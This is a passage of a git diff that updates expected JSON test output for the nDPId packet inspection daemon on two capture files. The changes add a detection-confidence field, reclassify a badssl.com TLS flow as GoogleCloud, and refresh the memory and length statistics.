 ~~ json string min len.......: 158 chars
-~~ json string max len.......: 915 chars
-~~ json string avg len.......: 600 chars
+~~ json string max len.......: 1107 chars
+~~ json string avg len.......: 695 chars
diff --git a/test/results/ssl-cert-name-mismatch.pcap.out b/test/results/ssl-cert-name-mismatch.pcap.out
index e762f8b5f..f91251a5c 100644
--- a/test/results/ssl-cert-name-mismatch.pcap.out
+++ b/test/results/ssl-cert-name-mismatch.pcap.out
@@ -3,10 +3,10 @@
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00889{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}}
-00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00922{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}}
+00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
 00171{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 21/21
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603646 bytes
-~~ total memory freed........: 4603646 bytes
-~~ total allocations/frees...: 99582/99582
+~~ total memory allocated....: 4688599 bytes
+~~ total memory freed........: 4688599 bytes
+~~ total allocations/frees...: 101172/101172
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 176 chars
-~~ json string max len.......: 1172 chars
-~~ json string avg len.......: 720 chars
+~~ json string max len.......: 1205 chars
+~~ json string avg len.......: 736 chars
diff --git a/test/results/starcraft_battle.pcap.out b/test/results/starcraft_battle.pcap.out
index 57407cb29..b852fe755 100644
--- a/test/results/starcraft_battle.pcap.out
+++ b/test/results/starcraft_battle.pcap.out
@@ -4,22 +4,22 @@
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437389953741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389953741,"pkt":"hCYVPnXEIImEa8W6CABFAABIX14AAIARVpTAqAFkwKgB\/uXCADUANEsbLmwBAAABAAAAAAAAAjkxAzI1MgIzMAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437389953742,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389953742,"pkt":"hCYVPnXEIImEa8W6CABFAABIX18AAIARVpPAqAFkwKgB\/uXCADUANO2f6I8BAAABAAAAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437389953743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1437389953743,"pkt":"IImEa8W6hCYVPnXECABFAABcAABAAEARtd7AqAH+wKgBZAA15cIASF7P6I+BgAABAAEAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAAAAAAgGbmItd2luAA=="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437389954543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2AAAIARVpLAqAFkwKgB\/uXPADUANOzD5FkBAAABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437389954543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2EAAIARVpHAqAFkwKgB\/uXPADUANAhuNT0BAAABAAAAAAAAAjI2AzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAE="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437389954544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389954544,"pkt":"IImEa8W6hCYVPnXECABFAABIAABAAEARtfLAqAH+wKgBZAA15c8ANGxA5FmBgwABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
